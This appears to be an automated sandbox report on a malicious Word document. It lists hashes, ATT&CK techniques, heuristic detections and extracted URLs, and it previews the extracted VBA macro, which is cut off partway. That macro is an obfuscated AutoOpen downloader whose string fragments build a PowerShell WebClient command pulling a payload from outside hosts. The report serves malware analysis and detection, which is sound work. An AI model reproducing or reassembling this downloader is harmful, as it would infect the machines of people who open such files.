Office (OLE) malware analysis — malicious · 456f848736a53da7

MALICIOUS

Office (OLE)

160.5 KB Created: 2017-11-27 20:30:00 Authoring application: Microsoft Office Word First seen: 2017-12-08

MD5: ac26fa09bfd77a7c27b074cb73e7e769 SHA-1: d23dce72e850391efbdb87a4b73e459d8f6c0880 SHA-256: 456f848736a53da76ecff983f9be3f2fabb8aacb6e6117a48d776e113d8d9d45

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes the Shell() function, indicating an attempt to execute an external command. This command likely downloads and executes a second-stage payload, as suggested by the embedded URL and the ClamAV detection for obfuscated macro malware. The specific URL used for the payload download is http://wwwwpq+wpq.wpq+wpqinwpq+wpqdpwpq+wpqtwpq+wpqs.cowpq+4kFiDPPF53bjwNKFql3ssEs.

Heuristics 7

ClamAV: Doc.Macro.Obfuscation-6387400-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://wwwwpq+wpq.wpq+wpqinwpq+wpqdpwpq+wpqtwpq+wpqs.cowpq+4kFiDPPF53bjwNKFql3ssEs� In document text (OLE body)
- http://wwwwpq+wpq.wpq+wpqinwpq+wpqdpwpq+wpqtwpq+wpqs.cowpq+4kFiDPPF53bjwNKFql3ssEsIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 80246 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	80246 bytes
SHA-256: `783bd21516710efc8ce978df9546bc2e0af5dc0c55669ec033438d0d4a8ca30f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "wAZTmAuKC" Function KRCtkpfTB() qABlZrS = Array(StrReverse("dmbajhqpfN"), StrReverse("MmupaaAKYv"), StrReverse("QwJfzmKEtF"), StrReverse("zqizfEficE"), StrReverse("RnSjMGLphB"), StrReverse("kiXvAfcwdz"), StrReverse("WlwaOWDvKV"), StrReverse("vShTdcfdTq")) OLhzi = Mid("GHNUp'+'q+wpqtwpq+wpqrwp75p+75pq+wpqy{wpq+wp'+'qD3hWdVWcvqoiwXv1NZB1jnwPv9qMO", 5, 46) TAKXT = Array(StrReverse("IqTaifnapI"), StrReverse("KoTzXGRdYJ"), StrReverse("vPFuKZpjRd"), StrReverse("WCLVFwMKwQ"), StrReverse("hJWJDtvDEq"), StrReverse("tpMVqslZPJ"), StrReverse("qHJMlIdztY"), StrReverse("tGiHbltvqQ")) DiOrWzuNzoF = Array(StrReverse("aVXsUQTnwA"), StrReverse("cjEfhjrsRq"), StrReverse("DPiMFSBDSX"), StrReverse("zzcnWAOEGw"), StrReverse("DQwKtMOCmw"), StrReverse("lnLdnLqLmB"), StrReverse("OPVbAdGQIj"), StrReverse("SmmTmmTUSt")) JqYPjk = Array(StrReverse("iSHqItMpEq"), StrReverse("IlJEbuzQik"), StrReverse("EvaQJzTocp"), StrReverse("ZKiaHsnSqZ"), StrReverse("aUVRLDkZuj"), StrReverse("BQRzLisrhL"), StrReverse("aYNPQwHiwi"), StrReverse("GiZEJjaJFG")) lFVOT = Mid("WMGYUwOu]A19VERBosEprEFEREncE)[75p+75p1,3]+wpq75p+75pXwpq-JOINwpqwpq)75p)-REpLacE 7'+'5pwpq75p,[cHaR]39 -CRePLaCe '+' 75pA'+'1975p,[cHaR]36-REpLacE ([cHaR]49+['+'cHaR]72+[cHaR]71)'+',[cHaR]124) ) ')ZQmZ", 9, 192) iPHlzTQvRb = Array(StrReverse("EzRVlMnzAL"), StrReverse("JDREjnuVJQ"), StrReverse("FztFizArqA"), StrReverse("rWsszPwAqn"), StrReverse("pGQzXPUhkz"), StrReverse("rwKCoGGMqm"), StrReverse("LvJzTnKZHU"), StrReverse("puiWazhvhP")) paIdrfPIcWq = Array(StrReverse("MttvnJtjPZ"), StrReverse("AwlfzCGFAM"), StrReverse("wCdLZWrMob"), StrReverse("IilazjiRcH"), StrReverse("FaTXiJtuFG"), StrReverse("cUIsJKQiWQ"), StrReverse("SjsnRRKKfS"), StrReverse("XodtHViGdP")) EzYJOAM = Array(StrReverse("uYKCAXJrqt"), StrReverse("nCMchjIPbw"), StrReverse("jEtlhPNYoi"), StrReverse("DImqRXAFcq"), StrReverse("zAzifwLNur"), StrReverse("ZaznZpiZVl"), StrReverse("KkDIpfQWLJ"), StrReverse("jDnlwiGPFi")) ilHYLdZBM = Mid("in4jLFozGO79mSWwwpqm/wpq+wpqUHwpq+wpqSD/,http:/wpq+wpq/w'+'w75p+75pw.fwpq+wpq75p+75pingerfwpq+wpqun.cwpq+wpqo'+'.uk/wpq75p+75p+wpqnpZdQQy/,http'+'://'+'w75p+75pwwpq+wp'+'qw.wpq+wpqrelicswpq'+'+75p+75pwpqtone'+'wppjpAHOISYXqajd", 17, 196) ttlfbcG = Array(StrReverse("dwHhznatRp"), StrReverse("QwvLpZifFQ"), StrReverse("zjPmjnqPln"), StrReverse("bJEGnVYKod"), StrReverse("rRtqCbtSEi"), StrReverse("nDANQthVwL"), StrReverse("wLIdOGroYT"), StrReverse("AYqcYiqYjI")) sGoQnw = Array(StrReverse("DzdwJdLwRc"), StrReverse("sajrjMwppA"), StrReverse("ipClLVmLoq"), StrReverse("iPUmiLGGzL"), StrReverse("TRFiRFTwEl"), StrReverse("mRZFANwskn"), StrReverse("qzJaucGzIV"), StrReverse("FqpdjQkUUG")) mwasSZqGVzj = Array(StrReverse("cznMcWwsXF"), StrReverse("wVjOosCJwT"), StrReverse("BcCokGzUdA"), StrReverse("UEtifrHcYV"), StrReverse("pzTVYGRsXJ"), StrReverse("EBCJnzvwcV"), StrReverse("WcOXkrbBiw"), StrReverse("kakadDIjQi")) idTIuBzuoEr = Mid("lq5ewpq+wpqct System.Net.WebCliwpq+wpqe'+'ntwpq+wpq;D3wnswpq+wpqadwpq+wpqawpq+wpq'+'sd wpq+wp75p'+'+75pq= nwpq+wpqew-wpq'+'+wpqo75p+75pwpq+wpqbject ranwpq+wpqjuGcInsCzNi", 4, 154) YslWGEQOij = Array(StrReverse("CqHCEQqOlU"), StrReverse("OOWMUUIioo"), StrReverse("wWnjjwbvZk"), StrReverse("ccYilAsGWd"), StrReverse("msLoGrTdIM"), StrReverse("IGffHfDXWI"), StrReverse("pupBsmqrbU"), StrReverse("bBHLCGLwdo")) zBspwbYqGi = Array(StrReverse("pGzTwTCkuj"), StrReverse("wIADwNiwlj"), StrReverse("iPJaYiQcjk"), StrReverse("qOizfQfuaQ"), StrReverse("prHCAcZhbQ"), StrReverse("UMvjAZwWuR"), StrReverse("DaDKqiZCXi"), StrReverse("inWUrnIHaw")) BitbrCA = Array(StrReverse("scUQNGtoEj"), StrReverse("vRGLWWVUdk"), StrReverse("OmRMmAJuES"), StrReverse("PjdaqLYpXi"), StrReverse("kWzPwXsrdj"), StrReverse("GzPutGKHdN"), StrReverse("zzjlROojUL"), StrReverse("wfzuzroCOP")) tPZKCocAajb = Mid("LfwI8wqs ... (truncated)

SHA-256: 783bd21516710efc8ce978df9546bc2e0af5dc0c55669ec033438d0d4a8ca30f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wAZTmAuKC"
Function KRCtkpfTB()
qABlZrS = Array(StrReverse("dmbajhqpfN"), StrReverse("MmupaaAKYv"), StrReverse("QwJfzmKEtF"), StrReverse("zqizfEficE"), StrReverse("RnSjMGLphB"), StrReverse("kiXvAfcwdz"), StrReverse("WlwaOWDvKV"), StrReverse("vShTdcfdTq"))
OLhzi = Mid("GHNUp'+'q+wpqtwpq+wpqrwp75p+75pq+wpqy{wpq+wp'+'qD3hWdVWcvqoiwXv1NZB1jnwPv9qMO", 5, 46)
TAKXT = Array(StrReverse("IqTaifnapI"), StrReverse("KoTzXGRdYJ"), StrReverse("vPFuKZpjRd"), StrReverse("WCLVFwMKwQ"), StrReverse("hJWJDtvDEq"), StrReverse("tpMVqslZPJ"), StrReverse("qHJMlIdztY"), StrReverse("tGiHbltvqQ"))
DiOrWzuNzoF = Array(StrReverse("aVXsUQTnwA"), StrReverse("cjEfhjrsRq"), StrReverse("DPiMFSBDSX"), StrReverse("zzcnWAOEGw"), StrReverse("DQwKtMOCmw"), StrReverse("lnLdnLqLmB"), StrReverse("OPVbAdGQIj"), StrReverse("SmmTmmTUSt"))
JqYPjk = Array(StrReverse("iSHqItMpEq"), StrReverse("IlJEbuzQik"), StrReverse("EvaQJzTocp"), StrReverse("ZKiaHsnSqZ"), StrReverse("aUVRLDkZuj"), StrReverse("BQRzLisrhL"), StrReverse("aYNPQwHiwi"), StrReverse("GiZEJjaJFG"))
lFVOT = Mid("WMGYUwOu]A19VERBosEprEFEREncE)[75p+75p1,3]+wpq75p+75pXwpq-JOINwpqwpq)75p)-REpLacE  7'+'5pwpq75p,[cHaR]39  -CRePLaCe '+' 75pA'+'1975p,[cHaR]36-REpLacE ([cHaR]49+['+'cHaR]72+[cHaR]71)'+',[cHaR]124) ) ')ZQmZ", 9, 192)
iPHlzTQvRb = Array(StrReverse("EzRVlMnzAL"), StrReverse("JDREjnuVJQ"), StrReverse("FztFizArqA"), StrReverse("rWsszPwAqn"), StrReverse("pGQzXPUhkz"), StrReverse("rwKCoGGMqm"), StrReverse("LvJzTnKZHU"), StrReverse("puiWazhvhP"))
paIdrfPIcWq = Array(StrReverse("MttvnJtjPZ"), StrReverse("AwlfzCGFAM"), StrReverse("wCdLZWrMob"), StrReverse("IilazjiRcH"), StrReverse("FaTXiJtuFG"), StrReverse("cUIsJKQiWQ"), StrReverse("SjsnRRKKfS"), StrReverse("XodtHViGdP"))
EzYJOAM = Array(StrReverse("uYKCAXJrqt"), StrReverse("nCMchjIPbw"), StrReverse("jEtlhPNYoi"), StrReverse("DImqRXAFcq"), StrReverse("zAzifwLNur"), StrReverse("ZaznZpiZVl"), StrReverse("KkDIpfQWLJ"), StrReverse("jDnlwiGPFi"))
ilHYLdZBM = Mid("in4jLFozGO79mSWwwpqm/wpq+wpqUHwpq+wpqSD/,http:/wpq+wpq/w'+'w75p+75pw.fwpq+wpq75p+75pingerfwpq+wpqun.cwpq+wpqo'+'.uk/wpq75p+75p+wpqnpZdQQy/,http'+'://'+'w75p+75pwwpq+wp'+'qw.wpq+wpqrelicswpq'+'+75p+75pwpqtone'+'wppjpAHOISYXqajd", 17, 196)
ttlfbcG = Array(StrReverse("dwHhznatRp"), StrReverse("QwvLpZifFQ"), StrReverse("zjPmjnqPln"), StrReverse("bJEGnVYKod"), StrReverse("rRtqCbtSEi"), StrReverse("nDANQthVwL"), StrReverse("wLIdOGroYT"), StrReverse("AYqcYiqYjI"))
sGoQnw = Array(StrReverse("DzdwJdLwRc"), StrReverse("sajrjMwppA"), StrReverse("ipClLVmLoq"), StrReverse("iPUmiLGGzL"), StrReverse("TRFiRFTwEl"), StrReverse("mRZFANwskn"), StrReverse("qzJaucGzIV"), StrReverse("FqpdjQkUUG"))
mwasSZqGVzj = Array(StrReverse("cznMcWwsXF"), StrReverse("wVjOosCJwT"), StrReverse("BcCokGzUdA"), StrReverse("UEtifrHcYV"), StrReverse("pzTVYGRsXJ"), StrReverse("EBCJnzvwcV"), StrReverse("WcOXkrbBiw"), StrReverse("kakadDIjQi"))
idTIuBzuoEr = Mid("lq5ewpq+wpqct System.Net.WebCliwpq+wpqe'+'ntwpq+wpq;D3wnswpq+wpqadwpq+wpqawpq+wpq'+'sd wpq+wp75p'+'+75pq= nwpq+wpqew-wpq'+'+wpqo75p+75pwpq+wpqbject ranwpq+wpqjuGcInsCzNi", 4, 154)
YslWGEQOij = Array(StrReverse("CqHCEQqOlU"), StrReverse("OOWMUUIioo"), StrReverse("wWnjjwbvZk"), StrReverse("ccYilAsGWd"), StrReverse("msLoGrTdIM"), StrReverse("IGffHfDXWI"), StrReverse("pupBsmqrbU"), StrReverse("bBHLCGLwdo"))
zBspwbYqGi = Array(StrReverse("pGzTwTCkuj"), StrReverse("wIADwNiwlj"), StrReverse("iPJaYiQcjk"), StrReverse("qOizfQfuaQ"), StrReverse("prHCAcZhbQ"), StrReverse("UMvjAZwWuR"), StrReverse("DaDKqiZCXi"), StrReverse("inWUrnIHaw"))
BitbrCA = Array(StrReverse("scUQNGtoEj"), StrReverse("vRGLWWVUdk"), StrReverse("OmRMmAJuES"), StrReverse("PjdaqLYpXi"), StrReverse("kWzPwXsrdj"), StrReverse("GzPutGKHdN"), StrReverse("zzjlROojUL"), StrReverse("wfzuzroCOP"))
tPZKCocAajb = Mid("LfwI8wqs
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.